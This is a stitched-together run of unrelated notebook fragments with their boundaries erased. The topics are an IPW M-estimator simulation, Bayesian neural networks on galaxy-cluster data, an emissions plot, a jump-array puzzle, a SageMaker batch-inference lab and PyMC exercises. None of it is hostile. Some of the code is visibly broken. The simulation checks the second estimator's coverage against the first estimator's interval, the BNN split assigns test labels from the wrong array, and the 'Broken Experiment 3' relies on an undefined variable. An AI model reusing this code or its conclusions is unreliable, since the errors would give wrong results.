weights pi_a = inverse_logit(logit_pi_aw) # Constructing numerator of weights pi_a_delta = inverse_logit(np.dot(W, coefs) + delta) # Creating IPW ipw = np.where(A==1, pi_a_delta/pi_a, (1-pi_a_delta)/(1-pi_a)) # Calculating ACE ya_delta = y*ipw - theta[0] return np.vstack((ya_delta[None, :], a_model)) starting_vals = [0, 0, 0] estr2 = MEstimator(psi, init=starting_vals) estr2.estimate(solver='lm') mean2 = estr2.theta[0] var2 = estr2.variance[0, 0] ci2 = estr2.confidence_intervals()[0, :] print("======================================") print("Accounting for Confounding") print("======================================") print("ACE: ", np.round(mean2, 3)) print("95% CI:", np.round(ci2, 3)) print("======================================")====================================== Accounting for Confounding ====================================== ACE: 26.765 95% CI: [26.648 26.882] ======================================While not extreme in this example, we can see that the confidence interval difference is smaller for the latter estimator. Ignoring the fact that we need to estimate pieces of the stochastic plan leads to a false sense of greater precision. The first estimator is what should be used here. Simulation studyTo better explore the difference between these two competing estimators, below is a simple simulation study. We will compare bias (no difference expected) and confidence interval coverage (the latter estimator may have below expected confidence interval coverage). We evaluate for a variety of values: $-5 \le \delta \le 5$.def dgm_true(delta): n = 1000000 d = pd.DataFrame() d['W'] = np.random.normal(size=n) pr_a = sp.stats.logistic.cdf(0. + 0.9*d['W'] + delta) d['A'] = np.random.binomial(n=1, p=pr_a, size=n) d['Ya1'] = (25 + 2 - 2.5*d['W'] + 1.6*1*d['W'] + np.random.normal(size=n)) d['Ya0'] = (25 + 0 - 2.5*d['W'] + 1.6*0*d['W'] + np.random.normal(size=n)) d['Y'] = np.where(d['A'] == 1, d['Ya1'], d['Ya0']) return np.mean(d['Y']) def dgm(n): d = pd.DataFrame() d['W'] = np.random.normal(size=n) pr_a = sp.stats.logistic.cdf(0. + 0.9*d['W']) d['A'] = np.random.binomial(n=1, p=pr_a, size=n) d['Ya1'] = (25 + 2 - 2.5*d['W'] + 1.6*1*d['W'] + np.random.normal(size=n)) d['Ya0'] = (25 + 0 - 2.5*d['W'] + 1.6*0*d['W'] + np.random.normal(size=n)) d['Y'] = np.where(d['A'] == 1, d['Ya1'], d['Ya0']) d['C'] = 1 return d[["W", "A", "C", "Y"]] def psi_estr1(theta, delta, W, A, y): beta = theta[1:] # Estimating Pr(A=1|W=w) for weights a_model = ee_logistic_regression(beta, X=W, y=A) logit_pi_aw = np.dot(W, beta) # Constructing denominator of weights pi_a = inverse_logit(logit_pi_aw) # Constructing numerator of weights pi_a_delta = inverse_logit(logit_pi_aw + delta) # Creating IPW ipw = np.where(A==1, pi_a_delta/pi_a, (1-pi_a_delta)/(1-pi_a)) # Calculating mean at stochastic policy ya_delta = y*ipw - theta[0] # Returning estimating equations return np.vstack((ya_delta[None, :], a_model)) def psi_estr2(theta, delta, W, A, y, coefs): beta = theta[1:] # Estimating Pr(A=1|W=w) for weights a_model = ee_logistic_regression(beta, X=W, y=A) logit_pi_aw = np.dot(W, beta) # Constructing denominator of weights pi_a = inverse_logit(logit_pi_aw) # Constructing numerator of weights pi_a_delta = inverse_logit(np.dot(W, coefs) + delta) # Creating IPW ipw = np.where(A==1, pi_a_delta/pi_a, (1-pi_a_delta)/(1-pi_a)) # Calculating mean at stochastic policy ya_delta = y*ipw - theta[0] # Returning estimating equations return np.vstack((ya_delta[None, :], a_model)) delta = np.linspace(-5, 5, 41) truth = {} est_estr1, est_estr2 = {}, {} ci_estr1, ci_estr2 = {}, {} for d in delta: truth[d] = dgm_true(delta=d) est_estr1[d], est_estr2[d] = [], [] ci_estr1[d], ci_estr2[d] = [], [] # Ignoring any warnings in the sims (to keep output clean) import warnings warnings.filterwarnings("ignore") for i in range(4000): data = dgm(n=1000) for d in delta: W = np.asarray(data[['C', 'W']]) A = np.asarray(data['A']) y = np.asarray(data['Y']) # First option def psi(theta): return psi_estr1(theta=theta, delta=d, W=W, A=A, y=y) starting_vals = [0, -0.1, 0.7] estr = MEstimator(psi, init=starting_vals) estr.estimate(solver='newton', maxiter=20000) est_estr1[d].append(estr.theta[0] - truth[d]) ci = estr.confidence_intervals()[0, :] if ci[0] < truth[d] and ci[1] > truth[d]: ci_estr1[d].append(1) else: ci_estr1[d].append(0) # Second option # previously optimized coefs coefficients = estr.theta[1:] def psi(theta): return psi_estr2(theta=theta, delta=d, W=W, A=A, y=y, coefs=coefficients) starting_vals = [0, -0.1, 0.7] estr = MEstimator(psi, init=starting_vals) estr.estimate(solver='newton', maxiter=20000) est_estr2[d].append(estr.theta[0] - truth[d]) if ci[0] < truth[d] and ci[1] > truth[d]: ci_estr2[d].append(1) else: ci_estr2[d].append(0) estr1_bias, estr2_bias = {}, {} estr1_lower, estr2_lower = {}, {} estr1_upper, estr2_upper = {}, {} for d in delta: estr1_bias[d] = np.mean(est_estr1[d]) estr2_bias[d] = np.mean(est_estr2[d]) estr1_lower[d] = np.quantile(est_estr1[d], q=0.05) estr2_lower[d] = np.quantile(est_estr2[d], q=0.05) estr1_upper[d] = np.quantile(est_estr1[d], q=0.95) estr2_upper[d] = np.quantile(est_estr2[d], q=0.95) plt.figure(figsize=[12, 5]) plt.subplot(121) plt.plot(estr1_bias.keys(), estr1_bias.values(), 'o-', color='blue') plt.plot(estr1_lower.keys(), estr1_lower.values(), 'o-', color='red') plt.plot(estr1_upper.keys(), estr1_upper.values(), 'o-', color='red') plt.xlabel(r"$\delta$") plt.ylabel("Mean under \n stochastic plan") plt.ylim([-0.5, 0.5]) plt.subplot(122) plt.plot(estr2_bias.keys(), estr2_bias.values(), 'o-', color='blue') plt.plot(estr1_lower.keys(), estr1_lower.values(), 'o-', color='red') plt.plot(estr1_upper.keys(), estr1_upper.values(), 'o-', color='red') plt.xlabel(r"$\delta$") plt.ylabel("Mean under \n stochastic plan") plt.ylim([-0.5, 0.5]) plt.tight_layout() estr1_cover, estr2_cover = {}, {} for d in delta: estr1_cover[d] = np.mean(ci_estr1[d]) estr2_cover[d] = np.mean(ci_estr2[d]) plt.figure(figsize=[12, 5]) plt.subplot(121) plt.plot(estr1_cover.keys(), estr1_cover.values(), 'o-', color='blue') plt.hlines(0.95, -5.1, 5.1, colors='k', linestyles='--') plt.xlabel(r"$\delta$") plt.ylabel("Confidence interval \n coverage") plt.ylim([0.8, 1]) plt.xlim([-5.1, 5.1]) plt.subplot(122) plt.plot(estr2_cover.keys(), estr2_cover.values(), 'o-', color='blue') plt.hlines(0.95, -5.1, 5.1, colors='k', linestyles='--') plt.xlabel(r"$\delta$") plt.ylabel("Confidence interval \n coverage") plt.ylim([0.8, 1]) plt.xlim([-5.1, 5.1]) plt.tight_layout()Case 2: Aleatoric Uncertainty using data cleaning from TancevOct 8 2021# Define helper functions. scaler = StandardScaler() detector = IsolationForest(n_estimators=1000, contamination="auto", random_state=0) gal_df = pd.read_csv("Data/galaxies_near_clusters_0.3-0.6.csv") cluster_data = pd.read_csv("Data/cluster_data_0.3-0.6.csv") # clear outliers xname="sm_0.67"; yname="halo_mass" xname="stellarmass"; yname="halo_mass" x=cluster_data[xname]; y=cluster_data[yname]; unit_df =pd.DataFrame(data={"x":x,"y":y}) print(unit_df.shape) # Scale data to zero mean and unit variance. X_t = scaler.fit_transform(unit_df) # Remove outliers. detector = IsolationForest(n_estimators=1000, contamination=0.05, random_state=0) is_inlier = detector.fit_predict(X_t) X_t = X_t[(is_inlier > 0),:] inv_df=pd.DataFrame(data={xname:X_t[:,0],yname:X_t[:,1]}) X_t = scaler.inverse_transform(inv_df) xc=X_t[:,0] yc=X_t[:,1] print(unit_df.shape) print(inv_df.shape) # Build model. model = tf.keras.Sequential([ tf.keras.layers.Dense(1 + 1), tfp.layers.DistributionLambda( lambda t: tfd.Normal(loc=t[..., :1], scale=1e-3 + tf.math.softplus(0.05 * t[...,1:]))), ]) negloglik = lambda y, rv_y: -rv_y.log_prob(y) # Do inference. model.compile(optimizer=tf.optimizers.Adam(learning_rate=0.01), loss=negloglik) model.fit(xc, yc, epochs=1000, verbose=False); # Profit. x_tst=np.arange(x.min(),x.max(),0.1) x_tst=x_tst[:,None] [print(np.squeeze(w.numpy())) for w in model.weights]; yhat = model(x_tst) assert isinstance(yhat, tfd.Distribution) inv_df=pd.DataFrame(data={xname:X_t[:,0],yname:X_t[:,1]}) sns.regplot(x=xname,y=yname, data=cluster_data, line_kws={"color": "blue"}) sns.regplot(x=xname,y=yname, data=inv_df, line_kws={"color": "orange"}) plt.plot(x_tst, yhat.mean(),'purple', label='mean', linewidth=3); plt.plot(x_tst, yhat.quantile(0.32),'g',linewidth=0.5); plt.plot(x_tst, yhat.quantile(0.68),'g',linewidth=0.5); plt.plot(x_tst, yhat.quantile(0.10),'g',linewidth=0.5); plt.plot(x_tst, yhat.quantile(0.90),'g',linewidth=0.5);This seemingly made very little difference, for a outlier set to contamination=0.05. Setting contamination=0.15 has a bigger effect. Folowing Probabilistic Bayesian Neural Networkshttps://keras.io/examples/keras_recipes/bayesian_neural_networks/Oct 8 2021import numpy as np import tensorflow as tf from tensorflow import keras from tensorflow.keras import layers import tensorflow_probability as tfp def get_train_and_test_splits(train_size, batch_size=1): import tensorflow_datasets as tfds import Data dataset = ( tfds.load(name="dataset", data_dir="./", as_supervised=False, split="train", download=False) .map(lambda x, y: (x, tf.cast(y, tf.float32))) .prefetch(buffer_size=dataset_size) .cache() ) # We shuffle with a buffer the same size as the dataset. train_dataset = ( dataset.take(train_size).shuffle(buffer_size=train_size).batch(batch_size) ) test_dataset = dataset.skip(train_size).batch(batch_size) return train_dataset, test_dataset hidden_units = [8, 8] learning_rate = 0.001 def run_experiment(model, loss, train_dataset, test_dataset, num_epochs = 100): model.compile( optimizer=keras.optimizers.RMSprop(learning_rate=learning_rate), loss=loss, metrics=[keras.metrics.RootMeanSquaredError()], ) x1 = train_dataset[0] x2 = train_dataset[1] y = train_dataset[2] tx1 = test_dataset[0] tx2 = test_dataset[1] ty = test_dataset[2] print("Start training the model...") #model.fit(x=[x1,x2], y=y, epochs=num_epochs, validation_data=[tx1,tx2,ty]) model.fit(x=[x1,x2], y=y, epochs=num_epochs) print("Model training finished.") _, rmse = model.evaluate(x=[x1,x2], y=y, verbose=0) print(f"Train RMSE: {round(rmse, 3)}") print("Evaluating model performance...") _, rmse = model.evaluate(x=[tx1,tx2], y=ty, verbose=0) print(f"Test RMSE: {round(rmse, 3)}") xname="sm_0.67"; yname="halo_mass" xname="stellarmass"; yname="halo_mass"; x2name="central_sm" gal_df = pd.read_csv("Data/galaxies_near_clusters_0.3-0.6.csv") cluster_data = pd.read_csv("Data/cluster_data_0.3-0.6.csv") x=cluster_data[xname]; y=cluster_data[yname]; x2=cluster_data[x2name] FEATURE_NAMES = [ xname, x2name, ] def create_model_inputs(): inputs = {} for feature_name in FEATURE_NAMES: inputs[feature_name] = layers.Input( name=feature_name, shape=(1,), dtype=tf.float32 ) return inputsExperiment 1: standard neural networkWe create a standard deterministic neural network model as a baseline.def create_baseline_model(): inputs = create_model_inputs() input_values = [value for _, value in sorted(inputs.items())] features = keras.layers.concatenate(input_values) features = layers.BatchNormalization()(features) # Create hidden layers with deterministic weights using the Dense layer. for units in hidden_units: features = layers.Dense(units, activation="sigmoid")(features) # The output is deterministic: a single point estimate. outputs = layers.Dense(units=1)(features) model = keras.Model(inputs=inputs, outputs=outputs) return model x = np.asarray(x).astype('float32') x2 = np.asarray(x2).astype('float32') y = np.asarray(y).astype('float32') n=150 x_tr=x[0:n]; x_te=x[n:] x2_tr=x2[0:n]; x2_te=x[n:] y_tr=y[0:n]; y_te=x[n:] xx_tr=np.array([x_tr,x2_tr,y_tr]); xx_te=np.array([x_te,x2_te,y_te]) print("xx_tr: {}".format(xx_tr.shape)) print("y_tr: {}".format(y_tr.shape)) train_dataset = [x_tr, x2_tr, y_tr] test_dataset = [x_te, x2_te, y_te] #train_dataset = pd.DataFrame({xname:xx_tr,yname:y_tr}) #test_dataset = pd.DataFrame({xname:xx_te,yname:y_te}) #print(train_dataset) #tr_df=tf.data.Dataset.from_tensor_slices(train_dataset) #te_df=tf.data.Dataset.from_tensor_slices(test_dataset) #tr_df=tf.convert_to_tensor(train_dataset, dtype=tf.float32) #te_df=tf.convert_to_tensor(test_dataset, dtype=tf.float32) #print(tr_df) #print(te_df) #dataset = train_dataset.enumerate() #for element in dataset.as_numpy_iterator(): # print(element) mse_loss = keras.losses.MeanSquaredError() baseline_model = create_baseline_model() baseline_model.summary() run_experiment(baseline_model, mse_loss, train_dataset, test_dataset) n_samples=30 y_fit = baseline_model.predict(x=[test_dataset[0], test_dataset[1]]) y_true = test_dataset[2] sns.regplot(x=y_true, y=y_fit)Experiment 2: Bayesian neural network (BNN)The object of the Bayesian approach for modeling neural networks is to capture the epistemic uncertainty, which is uncertainty about the model fitness, due to limited training data.The idea is that, instead of learning specific weight (and bias) values in the neural network, the Bayesian approach learns weight distributions - from which we can sample to produce an output for a given input - to encode weight uncertainty.Thus, we need to define prior and the posterior distributions of these weights, and the training process is to learn the parameters of these distributions.# Define the prior weight distribution as Normal of mean=0 and stddev=1. # Note that, in this example, the we prior distribution is not trainable, # as we fix its parameters. def prior(kernel_size, bias_size, dtype=None): n = kernel_size + bias_size prior_model = keras.Sequential( [ tfp.layers.DistributionLambda( lambda t: tfp.distributions.MultivariateNormalDiag( loc=tf.zeros(n), scale_diag=tf.ones(n) ) ) ] ) return prior_model # Define variational posterior weight distribution as multivariate Gaussian. # Note that the learnable parameters for this distribution are the means, # variances, and covariances. def posterior(kernel_size, bias_size, dtype=None): n = kernel_size + bias_size posterior_model = keras.Sequential( [ tfp.layers.VariableLayer(tfp.layers.MultivariateNormalTriL.params_size(n), dtype=dtype), tfp.layers.MultivariateNormalTriL(n), ] ) return posterior_model def xposterior(kernel_size, bias_size, dtype=None): n = kernel_size + bias_size c = np.log(np.expm1(1.)) posterior_model = keras.Sequential( [ tfp.layers.VariableLayer(2 * n, dtype=dtype), tfp.layers.DistributionLambda(lambda t: tfd.Independent( tfd.Normal( loc=t[..., :n], scale=1e-5 + tf.nn.softplus(c + t[..., n:]) ), reinterpreted_batch_ndims=1) ), ] ) return posterior_model def create_bnn_model(train_size): inputs = create_model_inputs() features = keras.layers.concatenate(list(inputs.values())) features = layers.BatchNormalization()(features) # Create hidden layers with weight uncertainty using the DenseVariational layer. for units in hidden_units: features = tfp.layers.DenseVariational( units=units, make_prior_fn=prior, make_posterior_fn=posterior, kl_weight=1 / train_size, activation="sigmoid", )(features) # The output is deterministic: a single point estimate. outputs = layers.Dense(units=1)(features) model = keras.Model(inputs=inputs, outputs=outputs) return modelWe use the tfp.layers.DenseVariational layer instead of the standard keras.layers.Dense layer in the neural network model. Train BNN with a small training subset.The epistemic uncertainty can be reduced as we increase the size of the training data. That is, the more data the BNN model sees, the more it is certain about its estimates for the weights (distribution parameters). Let's test this behaviour by training the BNN model on a small subset of the training set, and then on the full training set, to compare the output variances.num_epochs = 500 tr_size = train_dataset[0].size print(tr_size) bnn_model_small = create_bnn_model(train_dataset[0].size) run_experiment(bnn_model_small, mse_loss, train_dataset, test_dataset)150 WARNING:tensorflow:From /global/homes/a/annis/.conda/envs/tflow/lib/python3.9/site-packages/tensorflow/python/ops/linalg/linear_operator_lower_triangular.py:159: calling LinearOperator.__init__ (from tensorflow.python.ops.linalg.linear_operator) with graph_parents is deprecated and will be removed in a future version. Instructions for updating: Do not pass `graph_parents`. They will no longer be used. WARNING:tensorflow:From /global/homes/a/annis/.conda/envs/tflow/lib/python3.9/site-packages/tensorflow_probability/python/distributions/distribution.py:298: calling MultivariateNormalDiag.__init__ (from tensorflow_probability.python.distributions.mvn_diag) with scale_identity_multiplier is deprecated and will be removed after 2020-01-01. Instructions for updating: `scale_identity_multiplier` is deprecated; please combine it with `scale_diag` directly instead.Broken Experiment 3: probabilistic Bayesian neural networkSo far, the output of the standard and the Bayesian NN models that we built is deterministic, that is, produces a point estimate as a prediction for a given example. We can create a probabilistic NN by letting the model output a distribution. In this case, the model captures the aleatoric uncertainty as well, which is due to irreducible noise in the data, or to the stochastic nature of the process generating the data.In this example, we model the output as a IndependentNormal distribution, with learnable mean and variance parameters. If the task was classification, we would have used IndependentBernoulli with binary classes, and OneHotCategorical with multiple classes, to model distribution of the model output.Since the output of the model is a distribution, rather than a point estimate, we use the negative loglikelihood as our loss function to compute how likely to see the true data (targets) from the estimated distribution produced by the model.def create_probablistic_bnn_model(train_size): inputs = create_model_inputs() features = keras.layers.concatenate(list(inputs.values())) features = layers.BatchNormalization()(features) # Create hidden layers with weight uncertainty using the DenseVariational layer. for units in hidden_units: features = tfp.layers.DenseVariational( units=units, make_prior_fn=prior, make_posterior_fn=posterior, kl_weight=1 / train_size, activation="sigmoid", )(features) # Create a probabilisticå output (Normal distribution), and use the `Dense` layer # to produce the parameters of the distribution. # We set units=2 to learn both the mean and the variance of the Normal distribution. distribution_params = layers.Dense(units=2)(features) outputs = tfp.layers.IndependentNormal(1)(distribution_params) model = keras.Model(inputs=inputs, outputs=outputs) return model def negative_loglikelihood(targets, estimated_distribution): return -estimated_distribution.log_prob(targets) num_epochs = 1000 prob_bnn_model = create_probablistic_bnn_model(train_size) run_experiment(prob_bnn_model, negative_loglikelihood, train_dataset, test_dataset)from io import BytesIO import urllib, zipfile, requests r = urllib.request.urlopen('https://wri-sites.s3.amazonaws.com/climatewatch.org/www.climatewatch.org/climate-watch/climate-watch-download-zip/ghg-emissions.zip') with zipfile.ZipFile(BytesIO(r.read())) as z: print( z.namelist() ) z.extractall() import pandas as pd from matplotlib import pyplot as plt df = pd.read_excel('CW_CAIT_GHG_Emissions.xlsx', index_col='Country') df clean_df_including_LUCF = df[df.Sector == 'Total including LUCF'] clean_df_all_ghg = clean_df_including_LUCF[clean_df_including_LUCF.Gas == 'All GHG'] clean_df_all_ghg_transposed = clean_df_all_ghg.transpose() clean_df_all_ghg_transposed = clean_df_all_ghg_transposed.drop(['Source', 'Sector','Gas']) clean_df_all_ghg_transposed x_axis = clean_df_all_ghg_transposed.index china = clean_df_all_ghg_transposed.CHN usa = clean_df_all_ghg_transposed.USA india = clean_df_all_ghg_transposed.IND russia = clean_df_all_ghg_transposed.RUS japan = clean_df_all_ghg_transposed.JPN germany = clean_df_all_ghg_transposed.DEU iran = clean_df_all_ghg_transposed.IRN south_korea = clean_df_all_ghg_transposed.KOR saudi_arabia = clean_df_all_ghg_transposed.SAU indonesia = clean_df_all_ghg_transposed.IDN plt.plot(x_axis,china) plt.plot(x_axis,usa) plt.plot(x_axis,india) plt.plot(x_axis,russia) plt.plot(x_axis,japan) plt.plot(x_axis,germany) plt.plot(x_axis,iran) plt.plot(x_axis,south_korea) plt.plot(x_axis,saudi_arabia) plt.plot(x_axis,indonesia) plt.legend(['China', 'USA', 'India', 'Russia', 'Japan', 'Germany', 'Iran', 'South Korea', 'Saudi Arabia', 'Indonesia']) plt.title('Green House Gas Emissions Including LUCF') plt.xlabel('Year') plt.ylabel('GHG Emissions (Mt)') plt.savefig('/content/drive/MyDrive/topEmitters.png') plt.show()ProblemGiven an array of positive integers, find the minimum number of jumps required to get from the first index to the final one.Sample input:```array = [4, 2, 1, 1, 3, 1, 2, 1]```Sample output:```2 (4 --> 3 --> 1)```Note that jumping from index `i` to index `i + X` is still one jump, regardless of the size of X We build a new array to store minimum number of jumps from index 0 to rest of indices. The first is 0. (since step required to jump from an index to itself is zero)Progressively build the array using the previously computed min jumps.def minJumps(array): """O(n) space | O(n^2) time, since for every index, we are checking all elements to its left""" jumps = [float('inf') for i in array] jumps[0] = 0 for i in range(1, len(array)): for j in range(0, i): # check if value before i (array[j]), if the step j is added to it, will it exceed i if array[j] + j >= i: jumps[i] = min(jumps[i], jumps[j] + 1) # the last element contains the min jumps required to reach the end of array return jumps[-1] minJumps([4, 2, 1, 1, 3, 1, 2, 1])Huggingface Sagemaker-sdk - Run a batch transform inference job with 🤗 Transformers In the this lab, we will deploy one of the 10 000+ Hugging Face Transformers from the [Hub](https://huggingface.co/models) to Amazon SageMaker for batch inference. 1. [Setup](Setup) 3. [Run Batch Transform Inference Job with a fine-tuned model using `jsonl`](Run-Batch-Transform-Inference-Job-with-a-fine-tuned-model-using-jsonl) 3. [Download Dataset](Download-Dataset)3. [Data Pre-Processing](Data-Pre-Processing)3. [Download pre-trained model](Download-pre-trained-model)3. [Package pre-trained model into .tar.gz format](Package-pre-trained-model-into-.tar.gz-format)3. [Upload model to s3](Upload-model-to-s3)3. [Run batch transform job for offline scoring](Run-batch-transform-job-for-offline-scoring) Setup!pip install torch !pip install "sagemaker>=2.48.0" --upgrade !pip install transformers -q !pip install ipywidgets -q !pip install datasets # restart kernel after installing the packages from IPython.display import display_html def restartkernel() : display_html("",raw=True) restartkernel() import sagemaker sagemaker.__version__ import torch torch.__version__Run Batch Transform Inference Job with a fine-tuned model using `jsonl` Download DatasetDownload the `tweet_eval` dataset from the datasets library.from datasets import load_dataset dataset = load_dataset("tweet_eval", "sentiment") tweet_text = dataset['validation'][:]['text']Data Pre-Processing The dataset contains ~2000 tweets. We will format the dataset to a `jsonl` file and upload it to s3. Due to the complex structure of text are only `jsonl` file supported for batch/async inference._**NOTE**: While preprocessing you need to make sure that your `inputs` fit the `max_length`._import csv import json import sagemaker from sagemaker.s3 import S3Uploader,s3_path_join # get the s3 bucket sess = sagemaker.Session() role = sagemaker.get_execution_role() sagemaker_session_bucket = sess.default_bucket() # datset files dataset_jsonl_file="tweet_data.jsonl" # data_json = {} data_json = [] with open(dataset_jsonl_file, "w+") as outfile: for row in tweet_text: # remove @ row = row.replace("@","") json.dump({ 'inputs': str(row) }, outfile) data_json.append({ 'inputs': str(row) }) outfile.write('\n') # uploads a given file to S3. input_s3_path = s3_path_join("s3://",sagemaker_session_bucket,"batch_transform/input") output_s3_path = s3_path_join("s3://",sagemaker_session_bucket,"batch_transform/output") s3_file_uri = S3Uploader.upload(dataset_jsonl_file,input_s3_path) print(f"{dataset_jsonl_file} uploaded to {s3_file_uri}")The created file looks like this```json{"inputs": "Dark Souls 3 April Launch Date Confirmed With New Trailer: Embrace the darkness."}{"inputs": "\"National hot dog day, national tequila day, then national dance day... Sounds like a Friday night.\"}{"inputs": "When girls become bandwagon fans of the Packers because of Harry. Do y'all even know who is? Or what a 1st down is?"}{"inputs": "user I may or may not have searched it up on google"}{"inputs": "Here's your starting TUESDAY MORNING Line up at Gentle Yoga with Laura 9:30 am to 10:30 am..."}{"inputs": "VirginAmerica seriously would pay $30 a flight for seats that didn't h...."}{"inputs": "user F-Main, are you in the office tomorrow if I send over some Curtis proofs c/o you, for you and a few colleagues?\""},{"inputs": "US 1st Lady speaking at the 2015 Beating the Odds Summit to over 130 college-bound students at the pentagon office."},{"inputs": "Omg this show is so predictable even for the 3rd ep. Rui En\\u2019s ex boyfriend was framed for murder probably\\u002c by a guy."},{"inputs": "\"What a round by , good luck tomorrow and I hope you win the Open.\""},{"inputs": "Irving Plaza NYC Blackout Saturday night. Got limited spots left on the guest list. Tweet me why you think you deserve them"}....``` Download pre-trained modelWe use the [distilbert-base-uncased-finetuned-sst-2-english](https://huggingface.co/distilbert-base-uncased-finetuned-sst-2-english) model running our batch transform job.### Download Hugging Face Pretrained Model from transformers import AutoModelForSequenceClassification, AutoTokenizer MODEL = 'distilbert-base-uncased-finetuned-sst-2-english' model = AutoModelForSequenceClassification.from_pretrained(MODEL) tokenizer = AutoTokenizer.from_pretrained(MODEL) model.save_pretrained('model_token') tokenizer.save_pretrained('model_token')Package pre-trained model into .tar.gz format# package pre-trained model into .tar.gz format !cd model_token && tar zcvf model.tar.gz * !mv model_token/model.tar.gz ./model.tar.gzUpload model to s3# upload pre-trained model to s3 bucket model_url = s3_path_join("s3://",sagemaker_session_bucket,"batch_transform/model") print(f"Uploading Model to {model_url}") model_uri = S3Uploader.upload('model.tar.gz',model_url) print(f"Uploaded model to {model_uri}")Run batch transform job for offline scoringfrom sagemaker.huggingface.model import HuggingFaceModel # create Hugging Face Model Class huggingface_model = HuggingFaceModel( model_data=model_uri, # configuration for loading model from Hub role=role, # iam role with permissions to create an Endpoint transformers_version="4.6", # transformers version used pytorch_version="1.7", # pytorch version used py_version='py36', # python version used ) # create Transformer to run our batch job batch_job = huggingface_model.transformer( instance_count=1, instance_type='ml.g4dn.xlarge', output_path=output_s3_path, # we are using the same s3 path to save the output with the input strategy='SingleRecord') # starts batch transform job and uses s3 data as input batch_job.transform( data=s3_file_uri, content_type='application/json', split_type='Line') import json from sagemaker.s3 import S3Downloader from ast import literal_eval # creating s3 uri for result file -> input file + .out output_file = f"{dataset_jsonl_file}.out" output_path = s3_path_join(output_s3_path,output_file) # download file S3Downloader.download(output_path,'.') batch_transform_result = [] with open(output_file) as f: for line in f: # converts jsonline array to normal array line = "[" + line.replace("[","").replace("]",",") + "]" batch_transform_result = literal_eval(line) # print results batch_transform_result[:3]Harder problems The previous notebooks were addressing simple problems, that in most cases would not require a full Bayesian model to be fitted. We are now going to explore some more complex scenarios. First here is a list of the most interesting notebooks and exercises I've found. The PyMC documentation website is a goldmine itself, since they increasingly include a variety of examples all correlated by a notebook. Not all of them are relevant for the next problems, but you can check them out to have an idea of what one can do with Probabilistic modeling. **Rugby Example**https://docs.pymc.io/notebooks/rugby_analytics.html**Survival Analysis**https://docs.pymc.io/notebooks/bayes_param_survival_pymc3.html**CO2 Levels Prediction**https://docs.pymc.io/notebooks/GP-MaunaLoa.html**Dependent Density Regression**https://docs.pymc.io/notebooks/dependent_density_regression.html**Dirichlet Processes**https://docs.pymc.io/notebooks/dp_mix.html AB TestingAn example of AB Testing can be found in Chapter 2 of the Bayesian Methods for hackers (https://nbviewer.jupyter.org/github/CamDavidsonPilon/Probabilistic-Programming-and-Bayesian-Methods-for-Hackers/blob/master/Chapter2_MorePyMC/Ch2_MorePyMC_PyMC3.ipynb)A/B testing is a statistical design pattern for determining the difference of effectiveness between two different treatments, approaches, strategies. In the example above they model the case of web-developers interested in knowing which design of their website yields more sales or some other metric of interest. They will route some fraction of visitors to site A, and the other fraction to site B, and record if the visit yielded a sale or not. Here we go back to the IADS summer school example in the slides. Shaaba was still sending out invitations, as fliers and emails. After 1 month, she wanted to know which strategy was more effective and which one was more cost-effective. ( imagine a world where each flier/ad corresponds to a single signup). Idea: For AB testing, you should model both datasets with the same likelihood and check which one has the best values for the parameters. For cost-effectiveness, remember that you can use deterministic variables to evaluate the cost of each strategy.import numpy as np import pandas as pd import seaborn as sns import pymc3 as pm import matplotlib.pyplot as plt # Data: for each flier/ad we have a binary value # that corresponds to whether it was effective or not (the person signed) fliers = [1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0] emails = [1, 0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,1,1,1,1,0,0] # Cost of each flier/email (Shaaba's time isn't for free) cost_flier = 10 cost_email = 2 # Revenue for each sign up fee = 100 # How many times did someone sign up? What's the observed frequency for the sign up? #What was the cost of the two campaigns? print('Fliers: %d sent, %d signed up, %f ratio' %(len(fliers),np.sum(fliers),np.sum(fliers)/len(fliers) )) print('Cost: %f sent, Revenue %f' %(len(fliers)*cost_flier,np.sum(fliers)*fee)) print('Emails: %d sent, %d signed up, %f ratio' %(len(emails),np.sum(emails),np.sum(emails)/len(emails) )) print('Cost: %f sent, Revenue %f' %(len(emails)*cost_email,np.sum(emails)*fee)) # What distribution is appropriate to describe the likelihood of the data? # Build the model with pm.Model() as model: p_fliers=pm.Beta('p_fliers',alpha = 1, beta = 1 ) p_emails=pm.Beta('p_emails',alpha = 1, beta = 1 ) e_obs= pm.Bernoulli('e_obs', p=p_emails, observed = emails) f_obs= pm.Bernoulli('f_obs', p=p_fliers, observed = fliers) # Add deterministic variables to compare the two models ab = pm.Deterministic('ab', p_fliers-p_emails) test = pm.Deterministic('test', p_fliers>p_emails) r_fliers = pm.Deterministic('r_fliers', p_fliers*fee/cost_flier) r_emails = pm.Deterministic('r_emails', p_emails*fee/cost_email) delta_r = pm.Deterministic('delta_r', r_fliers-r_emails) # Inference trace = pm.sample(20000, tune= 1000) # Show results. Which approach is more effective? cost effective? What happens if the cost of fliers drops? # How many times was the sign up ratio of fliers higher than the one of emails np.sum(trace['test']/len(trace['test'])) pm.traceplot(trace)Image segmentationBayesian learning allows to fit mixture models and apply data clustering. A good starting point for clustering with PyMC3 is the notebook https://nbviewer.jupyter.org/github/CamDavidsonPilon/Probabilistic-Programming-and-Bayesian-Methods-for-Hackers/blob/master/Chapter3_MCMC/Ch3_IntroMCMC_PyMC3.ipynb.There they apply a clustering algorithm to a mixture model. Remove BackgroundTry here to remove the background from this image. Instead of the 2D image, imagine the histogram of the values of all pixels...At the beginning don't worry about the 2d structure of the image, there are filtering algorithms that can take care of that at the end.with open('dummy_image.txt', 'r') as f: data=np.loadtxt(f,delimiter =',') data=data.reshape(len(data)*len(data),) data.shape # Plot the histogram of the data sns.distplot(data) # Build a clustering model for the mixture distribution using categorical variables import pymc3 as pm import theano.tensor as T with pm.Model() as model: p1 = pm.Uniform('p', 0, 1) p2 = 1 - p1/2 p3 = 1 - p1/2 p = T.stack([p1, p2, p3]) assignment = pm.Categorical("assignment", p, shape=data.shape[0], testval=np.random.randint(0, 3, data.shape[0])) print("prior assignment, with p = %.2f:" % p1.tag.test_value) print(assignment.tag.test_value[:100]) with model: sds = pm.Gamma("sds", 10, 1, shape=1) centers = pm.Normal("centers", mu=np.array([-100, 0, 100]), sd=np.array([10, 10, 10]), shape=3) center_i = pm.Deterministic('center_i', centers[assignment]) #sd_i = pm.Deterministic('sd_i', sds[assignment]) # and to combine it with the observations: observations = pm.Normal("obs", mu=center_i, 